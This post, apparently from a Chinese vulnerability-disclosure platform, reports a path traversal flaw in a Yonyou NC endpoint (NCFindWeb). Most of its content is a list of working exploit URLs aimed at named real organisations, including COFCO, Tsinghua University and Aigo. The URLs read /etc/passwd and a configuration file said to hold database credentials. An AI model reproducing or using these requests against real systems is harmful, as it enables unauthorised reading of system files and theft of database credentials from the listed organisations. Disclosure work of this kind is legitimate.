漏洞作者: 管管侠
详细说明:
可以遍历各种系统文件,影响大量知名政校企
漏洞证明:
中粮集团
http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
还可以读取默认配置文件
http://nc.cofco.com/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
下面有中粮几十组数据库配置,数据库群
民生电商
http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
数据库配置
http://hr.minshengec.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
清华大学
http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://proxy.tup.tsinghua.edu.cn/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
爱国者
http://nc.aigo.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
以下也都是有效案例
http://nc.bcegc.com/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
http://oa.tianue.com:8888/NCFindWeb?service=IPreAlertConfigService&filename=../../../../../etc/passwd
.........
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论